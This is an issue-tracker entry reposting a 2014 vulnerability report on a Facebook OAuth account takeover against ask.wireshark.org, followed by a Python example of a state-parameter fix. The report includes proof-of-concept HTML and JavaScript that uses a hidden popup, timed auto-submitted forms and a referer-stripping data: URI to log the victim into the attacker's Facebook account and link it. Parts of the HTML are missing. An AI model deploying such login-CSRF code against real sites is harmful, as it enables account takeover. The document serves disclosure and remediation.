[OSQA-954] Account takeover using facebook OAuth #503

Open
javierder opened this Issue May 13, 2015 · 0 comments


@javierder
Member

[reporter="d3xt0r", created="Thu, 28 Aug 2014 08:41:28 -0400"]
Hey!!

It's me, Daksh Patel, here! I would like to report an account takeover using Facebook OAuth. I tested this on Wireshark (https://ask.wireshark.org/account/signin/).




Steps to reproduce:

1) First allow any app to your Facebook account, like I tested on Wireshark.

2) Now open your account and use these files. Open this test.html file and it'll call the fb_login.html file, and bang!! This'll add the attacker's Facebook account to the victim.

Save the test.html and fb_login.html.

I) test.html contains the auth link to Facebook. First open this file:

//test.html


  
   <script type="text/javascript">
 
  function fb_login() {
    return (window.open("./fb_login.html", "_blank",
"status=0,scrollbars=0,menubar=0,resizable=0,scrollbars=0,width=1,height=1"));
  }
 
   function hi_addlogin() {
     document.getElementById("sForm").submit();
  }

 
   function pwn() {
     win1 = fb_login();
     setTimeout("hi_addlogin()", 7000);
     //win1.close()
     win2 = agree();
     setTimeout("fb_login()", 7000);
     //win2.close()
  }
 
   </script>
 
 
 
     action="https://ask.wireshark.org/account/facebook/signin/" method="GET">
      
       value="https://graph.facebook.com/oauth/authorize"
/>
      
    
 
  pwn
  


II) The fb_login file contains the Facebook login. Change the email and password in this file.


 
   <script type="text/javascript">
  function post_without_referer() {
    // POST request, WebKit & Firefox. Data, meta & form submit trinity
   location = 'data:text/html,https://www.facebook.com/login.php?login_attempt=1\'>' +
              '' +
              '' +
              '' +
              '<script>document.getElementById(\'dynForm\').submit()">';
}
 
   </script>
  


//change the email and password.

//to get victim logged in attacker's account


Lemme know if you need any help.

Regards,
Daksh Patel
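The report above describes a login CSRF against the Facebook sign-in callback: the victim's browser is driven through an OAuth flow the victim never started, so the attacker's Facebook identity gets linked to the victim's session. The standard fix is to bind each OAuth flow to the session that began it with a one-time `state` value and to refuse any callback that does not present it. Below is an added, framework-free Python example of that check (not OSQA's own code); it assumes the root cause is a callback that accepts any authorize result regardless of who initiated the flow, and `exchange_code` stands in for the provider round-trip.

```python
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

AUTHORIZE_URL = "https://graph.facebook.com/oauth/authorize"  # as quoted in the report
# Callback path as it appears in the report; any real deployment would configure its own.
REDIRECT_URI = "https://ask.wireshark.org/account/facebook/signin/"


def begin_facebook_link(session, client_id):
    """Start the flow: mint an unguessable, single-use state, remember it in the
    caller's session, and build the authorize URL that carries it."""
    state = secrets.token_urlsafe(32)
    session["fb_oauth_state"] = state
    query = urlencode({
        "client_id": client_id,
        "redirect_uri": REDIRECT_URI,
        "response_type": "code",
        "state": state,
    })
    return f"{AUTHORIZE_URL}?{query}"


def complete_facebook_link(session, callback_url, exchange_code):
    """Handle the provider's redirect back. Link a Facebook identity only when the
    request carries the exact state this session minted. The stored state is
    consumed on first use, so a forged or replayed callback is rejected and the
    user has to restart the flow. Returns the linked provider user id, or None."""
    params = parse_qs(urlparse(callback_url).query)
    presented = params.get("state", [None])[0]
    expected = session.pop("fb_oauth_state", None)  # single use, whatever the outcome
    if expected is None or presented is None:
        return None
    if not secrets.compare_digest(presented, expected):
        return None
    code = params.get("code", [None])[0]
    if code is None:
        return None
    fb_user_id = exchange_code(code)  # hypothetical: trades the code for the provider's user id
    session.setdefault("linked_accounts", []).append(("facebook", fb_user_id))
    return fb_user_id


def state_from(authorize_url):
    """Helper for callers and tests: pull the state back out of the authorize URL."""
    return parse_qs(urlparse(authorize_url).query)["state"][0]
```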